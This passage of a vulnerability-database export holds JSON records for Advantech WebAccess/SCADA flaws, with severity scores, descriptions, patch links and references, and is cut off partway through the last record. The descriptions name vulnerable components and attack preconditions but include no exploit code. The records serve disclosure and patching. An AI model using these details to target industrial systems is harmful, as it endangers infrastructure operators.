"version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2020-12022", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 9.8, "baseSeverity": "Critical", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "JVNDB-2020-005146", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2020-12022", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 0.7, "userInteraction": "NONE", "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2020-12022", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "JVNDB-2020-005146", "trust": 0.8, "value": "Critical" }, { "author": "ZDI", "id": "CVE-2020-12022", "trust": 0.7, "value": "CRITICAL" }, { "author": "CNVD", "id": "CNVD-2020-27432", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-202005-313", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "6265122d-0d35-44b3-85ea-0c5f7b711a0d", "trust": 0.2, "value": "HIGH" }, { "author": "IVD", "id": "19380447-9612-4180-8a2e-efbd7ba08404", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-164659", "trust": 0.1, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2020-12022", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "6265122d-0d35-44b3-85ea-0c5f7b711a0d" }, { "db": "IVD", "id": "19380447-9612-4180-8a2e-efbd7ba08404" }, { "db": "ZDI", "id": "ZDI-20-598" }, { "db": "CNVD", "id": "CNVD-2020-27432" }, { "db": "VULHUB", "id": "VHN-164659" }, { "db": "VULMON", "id": "CVE-2020-12022" }, { "db": "JVNDB", "id": "JVNDB-2020-005146" }, { "db": "CNNVD", "id": "CNNVD-202005-313" }, { "db": "NVD", "id": "CVE-2020-12022" } ] }, "description": { "_id": null, "data": "Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. An improper validation vulnerability exists that could allow an attacker to inject specially crafted input into memory where it can be executed. Advantech WebAccess Node Exists in a past traversal vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Advantech WebAccess/SCADA. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of IOCTL 0x0000521e in DATACORE.exe. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess is a browser-based SCADA software package for monitoring, data acquisition, and visualization. It is used to automate complex industrial processes when remote operation is required", "sources": [ { "db": "NVD", "id": "CVE-2020-12022" }, { "db": "JVNDB", "id": "JVNDB-2020-005146" }, { "db": "ZDI", "id": "ZDI-20-598" }, { "db": "CNVD", "id": "CNVD-2020-27432" }, { "db": "IVD", "id": "6265122d-0d35-44b3-85ea-0c5f7b711a0d" }, { "db": "IVD", "id": "19380447-9612-4180-8a2e-efbd7ba08404" }, { "db": "VULHUB", "id": "VHN-164659" }, { "db": "VULMON", "id": "CVE-2020-12022" } ], "trust": 3.33 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2020-12022", "trust": 4.3 }, { "db": "ICS CERT", "id": "ICSA-20-128-01", "trust": 3.2 }, { "db": "ZDI", "id": "ZDI-20-598", "trust": 2.5 }, { "db": "CNVD", "id": "CNVD-2020-27432", "trust": 1.1 }, { "db": "CNNVD", "id": "CNNVD-202005-313", "trust": 1.1 }, { "db": "JVN", "id": "JVNVU93292753", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2020-005146", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-9988", "trust": 0.7 }, { "db": "AUSCERT", "id": "ESB-2020.1646", "trust": 0.6 }, { "db": "NSFOCUS", "id": "47693", "trust": 0.6 }, { "db": "IVD", "id": "6265122D-0D35-44B3-85EA-0C5F7B711A0D", "trust": 0.2 }, { "db": "IVD", "id": "19380447-9612-4180-8A2E-EFBD7BA08404", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-164659", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2020-12022", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "6265122d-0d35-44b3-85ea-0c5f7b711a0d" }, { "db": "IVD", "id": "19380447-9612-4180-8a2e-efbd7ba08404" }, { "db": "ZDI", "id": "ZDI-20-598" }, { "db": "CNVD", "id": "CNVD-2020-27432" }, { "db": "VULHUB", "id": "VHN-164659" }, { "db": "VULMON", "id": "CVE-2020-12022" }, { "db": "JVNDB", "id": "JVNDB-2020-005146" }, { "db": "CNNVD", "id": "CNNVD-202005-313" }, { "db": "NVD", "id": "CVE-2020-12022" } ] }, "id": "VAR-202005-0311", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "6265122d-0d35-44b3-85ea-0c5f7b711a0d" }, { "db": "IVD", "id": "19380447-9612-4180-8a2e-efbd7ba08404" }, { "db": "CNVD", "id": "CNVD-2020-27432" }, { "db": "VULHUB", "id": "VHN-164659" } ], "trust": 1.679503486666667 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 1.0 } ], "sources": [ { "db": "IVD", "id": "6265122d-0d35-44b3-85ea-0c5f7b711a0d" }, { "db": "IVD", "id": "19380447-9612-4180-8a2e-efbd7ba08404" }, { "db": "CNVD", "id": "CNVD-2020-27432" } ] }, "last_update_date": "2024-11-23T21:59:18.540000Z", "patch": { "_id": null, "data": [ { "title": "Top Page", "trust": 0.8, "url": "https://www.advantech.com/" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-36" }, { "title": "Patch for Advantech WebAccess Node input validation error vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/218857" }, { "title": "Advantech WebAccess Node Enter the fix for the verification error vulnerability", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=118220" } ], "sources": [ { "db": "ZDI", "id": "ZDI-20-598" }, { "db": "CNVD", "id": "CNVD-2020-27432" }, { "db": "JVNDB", "id": "JVNDB-2020-005146" }, { "db": "CNNVD", "id": "CNNVD-202005-313" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-129", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-164659" }, { "db": "JVNDB", "id": "JVNDB-2020-005146" }, { "db": "NVD", "id": "CVE-2020-12022" } ] }, "references": { "_id": null, "data": [ { "trust": 3.2, "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01" }, { "trust": 1.8, "url": "https://www.zerodayinitiative.com/advisories/zdi-20-598/" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12022" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-12022" }, { "trust": 0.8, "url": "https://jvn.jp/vu/jvnvu93292753/" }, { "trust": 0.7, "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-36" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.1646/" }, { "trust": 0.6, "url": "http://www.nsfocus.net/vulndb/47693" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/129.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/181602" } ], "sources": [ { "db": "ZDI", "id": "ZDI-20-598" }, { "db": "CNVD", "id": "CNVD-2020-27432" }, { "db": "VULHUB", "id": "VHN-164659" }, { "db": "VULMON", "id": "CVE-2020-12022" }, { "db": "JVNDB", "id": "JVNDB-2020-005146" }, { "db": "CNNVD", "id": "CNNVD-202005-313" }, { "db": "NVD", "id": "CVE-2020-12022" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "6265122d-0d35-44b3-85ea-0c5f7b711a0d", "ident": null }, { "db": "IVD", "id": "19380447-9612-4180-8a2e-efbd7ba08404", "ident": null }, { "db": "ZDI", "id": "ZDI-20-598", "ident": null }, { "db": "CNVD", "id": "CNVD-2020-27432", "ident": null }, { "db": "VULHUB", "id": "VHN-164659", "ident": null }, { "db": "VULMON", "id": "CVE-2020-12022", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2020-005146", "ident": null }, { "db": "CNNVD", "id": "CNNVD-202005-313", "ident": null }, { "db": "NVD", "id": "CVE-2020-12022", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2020-05-07T00:00:00", "db": "IVD", "id": "6265122d-0d35-44b3-85ea-0c5f7b711a0d", "ident": null }, { "date": "2020-05-07T00:00:00", "db": "IVD", "id": "19380447-9612-4180-8a2e-efbd7ba08404", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-598", "ident": null }, { "date": "2020-05-09T00:00:00", "db": "CNVD", "id": "CNVD-2020-27432", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "VULHUB", "id": "VHN-164659", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "VULMON", "id": "CVE-2020-12022", "ident": null }, { "date": "2020-06-08T00:00:00", "db": "JVNDB", "id": "JVNDB-2020-005146", "ident": null }, { "date": "2020-05-07T00:00:00", "db": "CNNVD", "id": "CNNVD-202005-313", "ident": null }, { "date": "2020-05-08T12:15:11.363000", "db": "NVD", "id": "CVE-2020-12022", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-598", "ident": null }, { "date": "2020-05-25T00:00:00", "db": "CNVD", "id": "CNVD-2020-27432", "ident": null }, { "date": "2020-05-11T00:00:00", "db": "VULHUB", "id": "VHN-164659", "ident": null }, { "date": "2020-05-11T00:00:00", "db": "VULMON", "id": "CVE-2020-12022", "ident": null }, { "date": "2020-06-08T00:00:00", "db": "JVNDB", "id": "JVNDB-2020-005146", "ident": null }, { "date": "2020-12-31T00:00:00", "db": "CNNVD", "id": "CNNVD-202005-313", "ident": null }, { "date": "2024-11-21T04:59:07.913000", "db": "NVD", "id": "CVE-2020-12022", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-202005-313" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess Node Input validation error vulnerability", "sources": [ { "db": "IVD", "id": "6265122d-0d35-44b3-85ea-0c5f7b711a0d" }, { "db": "IVD", "id": "19380447-9612-4180-8a2e-efbd7ba08404" }, { "db": "CNVD", "id": "CNVD-2020-27432" }, { "db": "CNNVD", "id": "CNNVD-202005-313" } ], "trust": 1.6 }, "type": { "_id": null, "data": "Input validation error", "sources": [ { "db": "IVD", "id": "6265122d-0d35-44b3-85ea-0c5f7b711a0d" }, { "db": "IVD", "id": "19380447-9612-4180-8a2e-efbd7ba08404" }, { "db": "CNNVD", "id": "CNNVD-202005-313" } ], "trust": 1.0 } }
var-201702-0673
Vulnerability from variot
An issue was discovered in Advantech WebAccess Version 8.1. By accessing a specific uniform resource locator (URL) on the web server, a malicious user is able to access pages unrestricted (AUTHENTICATION BYPASS). This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Advantech WebAccess. Authentication is required to exploit this vulnerability, but can be easily bypassed.The specific flaw exists within updateTemplate.aspx. The vulnerability is caused by lack of input validation before using a remotely supplied string to construct SQL queries. An attacker can use this vulnerability to disclose passwords of administrative accounts used by Advantech WebAccess. Advantech WebAccess (formerly known as BroadWinWebAccess) is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A security bypass vulnerability exists in Advantech WebAccess version 8.1. An attacker could exploit the vulnerability to bypass certain security restrictions and perform unauthorized operations. Advantech WebAccess is prone to an SQL-injection vulnerability and an authentication-bypass vulnerability. WebAccess 8.1 is vulnerable; other versions may also be affected
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": "eq", "trust": 3.3, "vendor": "advantech", "version": "8.1" }, { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.2" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "8.1" } ], "sources": [ { "db": "IVD", "id": "ec77c86b-3355-445c-a5a5-7138437a8d7a" }, { "db": "ZDI", "id": "ZDI-17-043" }, { "db": "CNVD", "id": "CNVD-2017-00552" }, { "db": "BID", "id": "95410" }, { "db": "JVNDB", "id": "JVNDB-2017-001615" }, { "db": "CNNVD", "id": "CNNVD-201701-327" }, { "db": "NVD", "id": "CVE-2017-5152" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-001615" } ] }, "credits": { "_id": null, "data": "Tenable Network Security", "sources": [ { "db": "ZDI", "id": "ZDI-17-043" }, { "db": "BID", "id": "95410" } ], "trust": 1.0 }, "cve": "CVE-2017-5152", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2017-5152", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "CVE-2017-5152", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "CNVD-2017-00552", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "ec77c86b-3355-445c-a5a5-7138437a8d7a", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-113355", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2017-5152", "impactScore": 5.2, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2017-5152", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2017-5152", "trust": 0.8, "value": "Critical" }, { "author": "ZDI", "id": "CVE-2017-5152", "trust": 0.7, "value": "MEDIUM" }, { "author": "CNVD", "id": "CNVD-2017-00552", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201701-327", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "ec77c86b-3355-445c-a5a5-7138437a8d7a", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-113355", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "ec77c86b-3355-445c-a5a5-7138437a8d7a" }, { "db": "ZDI", "id": "ZDI-17-043" }, { "db": "CNVD", "id": "CNVD-2017-00552" }, { "db": "VULHUB", "id": "VHN-113355" }, { "db": "JVNDB", "id": "JVNDB-2017-001615" }, { "db": "CNNVD", "id": "CNNVD-201701-327" }, { "db": "NVD", "id": "CVE-2017-5152" } ] }, "description": { "_id": null, "data": "An issue was discovered in Advantech WebAccess Version 8.1. By accessing a specific uniform resource locator (URL) on the web server, a malicious user is able to access pages unrestricted (AUTHENTICATION BYPASS). This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Advantech WebAccess. Authentication is required to exploit this vulnerability, but can be easily bypassed.The specific flaw exists within updateTemplate.aspx. The vulnerability is caused by lack of input validation before using a remotely supplied string to construct SQL queries. An attacker can use this vulnerability to disclose passwords of administrative accounts used by Advantech WebAccess. Advantech WebAccess (formerly known as BroadWinWebAccess) is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A security bypass vulnerability exists in Advantech WebAccess version 8.1. An attacker could exploit the vulnerability to bypass certain security restrictions and perform unauthorized operations. Advantech WebAccess is prone to an SQL-injection vulnerability and an authentication-bypass vulnerability. \nWebAccess 8.1 is vulnerable; other versions may also be affected", "sources": [ { "db": "NVD", "id": "CVE-2017-5152" }, { "db": "JVNDB", "id": "JVNDB-2017-001615" }, { "db": "ZDI", "id": "ZDI-17-043" }, { "db": "CNVD", "id": "CNVD-2017-00552" }, { "db": "BID", "id": "95410" }, { "db": "IVD", "id": "ec77c86b-3355-445c-a5a5-7138437a8d7a" }, { "db": "VULHUB", "id": "VHN-113355" } ], "trust": 3.33 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2017-5152", "trust": 4.3 }, { "db": "ICS CERT", "id": "ICSA-17-012-01", "trust": 3.4 }, { "db": "BID", "id": "95410", "trust": 2.0 }, { "db": "ZDI", "id": "ZDI-17-043", "trust": 1.6 }, { "db": "TENABLE", "id": "TRA-2017-04", "trust": 1.1 }, { "db": "CNNVD", "id": "CNNVD-201701-327", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2017-00552", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2017-001615", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3679", "trust": 0.7 }, { "db": "IVD", "id": "EC77C86B-3355-445C-A5A5-7138437A8D7A", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-113355", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "ec77c86b-3355-445c-a5a5-7138437a8d7a" }, { "db": "ZDI", "id": "ZDI-17-043" }, { "db": "CNVD", "id": "CNVD-2017-00552" }, { "db": "VULHUB", "id": "VHN-113355" }, { "db": "BID", "id": "95410" }, { "db": "JVNDB", "id": "JVNDB-2017-001615" }, { "db": "CNNVD", "id": "CNNVD-201701-327" }, { "db": "NVD", "id": "CVE-2017-5152" } ] }, "id": "VAR-201702-0673", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "ec77c86b-3355-445c-a5a5-7138437a8d7a" }, { "db": "CNVD", "id": "CNVD-2017-00552" }, { "db": "VULHUB", "id": "VHN-113355" } ], "trust": 1.33470696 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "ec77c86b-3355-445c-a5a5-7138437a8d7a" }, { "db": "CNVD", "id": "CNVD-2017-00552" } ] }, "last_update_date": "2024-11-23T22:01:18.912000Z", "patch": { "_id": null, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-012-01" }, { "title": "Advantech WebAccess Security Vulnerability Patch", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/88105" }, { "title": "Advantech WebAccess Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=66986" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-043" }, { "db": "CNVD", "id": "CNVD-2017-00552" }, { "db": "JVNDB", "id": "JVNDB-2017-001615" }, { "db": "CNNVD", "id": "CNNVD-201701-327" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-287", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-113355" }, { "db": "JVNDB", "id": "JVNDB-2017-001615" }, { "db": "NVD", "id": "CVE-2017-5152" } ] }, "references": { "_id": null, "data": [ { "trust": 3.8, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-012-01" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/95410" }, { "trust": 1.1, "url": "https://www.tenable.com/security/research/tra-2017-04" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-5152" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2017-5152" }, { "trust": 0.6, "url": "http://www.zerodayinitiative.com/advisories/zdi-17-043/" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" }, { "trust": 0.3, "url": "http://www.zerodayinitiative.com/advisories/zdi-17-043/ " }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-012-01 " } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-043" }, { "db": "CNVD", "id": "CNVD-2017-00552" }, { "db": "VULHUB", "id": "VHN-113355" }, { "db": "BID", "id": "95410" }, { "db": "JVNDB", "id": "JVNDB-2017-001615" }, { "db": "CNNVD", "id": "CNNVD-201701-327" }, { "db": "NVD", "id": "CVE-2017-5152" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "ec77c86b-3355-445c-a5a5-7138437a8d7a", "ident": null }, { "db": "ZDI", "id": "ZDI-17-043", "ident": null }, { "db": "CNVD", "id": "CNVD-2017-00552", "ident": null }, { "db": "VULHUB", "id": "VHN-113355", "ident": null }, { "db": "BID", "id": "95410", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2017-001615", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201701-327", "ident": null }, { "db": "NVD", "id": "CVE-2017-5152", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-01-18T00:00:00", "db": "IVD", "id": "ec77c86b-3355-445c-a5a5-7138437a8d7a", "ident": null }, { "date": "2017-01-12T00:00:00", "db": "ZDI", "id": "ZDI-17-043", "ident": null }, { "date": "2017-01-18T00:00:00", "db": "CNVD", "id": "CNVD-2017-00552", "ident": null }, { "date": "2017-02-13T00:00:00", "db": "VULHUB", "id": "VHN-113355", "ident": null }, { "date": "2017-01-12T00:00:00", "db": "BID", "id": "95410", "ident": null }, { "date": "2017-03-08T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-001615", "ident": null }, { "date": "2017-01-13T00:00:00", "db": "CNNVD", "id": "CNNVD-201701-327", "ident": null }, { "date": "2017-02-13T21:59:02.643000", "db": "NVD", "id": "CVE-2017-5152", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-01-12T00:00:00", "db": "ZDI", "id": "ZDI-17-043", "ident": null }, { "date": "2017-01-18T00:00:00", "db": "CNVD", "id": "CNVD-2017-00552", "ident": null }, { "date": "2017-11-03T00:00:00", "db": "VULHUB", "id": "VHN-113355", "ident": null }, { "date": "2017-01-23T04:05:00", "db": "BID", "id": "95410", "ident": null }, { "date": "2017-03-08T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-001615", "ident": null }, { "date": "2017-01-13T00:00:00", "db": "CNNVD", "id": "CNNVD-201701-327", "ident": null }, { "date": "2024-11-21T03:27:09.607000", "db": "NVD", "id": "CVE-2017-5152", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201701-327" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess Security Bypass Vulnerability", "sources": [ { "db": "IVD", "id": "ec77c86b-3355-445c-a5a5-7138437a8d7a" }, { "db": "CNVD", "id": "CNVD-2017-00552" } ], "trust": 0.8 }, "type": { "_id": null, "data": "authorization issue", "sources": [ { "db": "CNNVD", "id": "CNNVD-201701-327" } ], "trust": 0.6 } }
var-201407-0235
Vulnerability from variot
upAdminPg.asp in Advantech WebAccess before 7.2 allows remote authenticated users to discover credentials by reading HTML source code. This vulnerability allows remote attackers to disclose arbitrary credentials on vulnerable versions of Advantech WebAccess. Authentication is required to exploit this vulnerability. The specific flaw exists within the upAdminPg.asp component. An authenticated user can provide an arbitrary existing account name to this page and receive the account password. An attacker can leverage this vulnerability to then authenticate as the WebAccess Administrator. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess has a password disclosure vulnerability, and its upAdminPg.asp component contains passwords for specific accounts, allowing attackers to exploit vulnerabilities to obtain sensitive information. Advantech WebAccess is prone to a remote information-disclosure vulnerability. This may aid in further attacks. Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. There are security holes in the upAdminPg.asp script of Advantech WebAccess 7.1 and earlier versions
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "7.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "6.0" }, { "_id": null, "model": "webaccess", "scope": "lt", "trust": 1.4, "vendor": "advantech", "version": "7.2" }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "7.1" }, { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "7.1" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "5.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "6.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "7.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "7d7feb0f-463f-11e9-8e94-000c29342cb1" }, { "db": "IVD", "id": "e493ef22-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-250" }, { "db": "CNVD", "id": "CNVD-2014-04530" }, { "db": "JVNDB", "id": "JVNDB-2014-003489" }, { "db": "CNNVD", "id": "CNNVD-201407-478" }, { "db": "NVD", "id": "CVE-2014-2366" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-003489" } ] }, "credits": { "_id": null, "data": "John Leitch", "sources": [ { "db": "ZDI", "id": "ZDI-14-250" } ], "trust": 0.7 }, "cve": "CVE-2014-2366", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "CVE-2014-2366", "impactScore": 2.9, 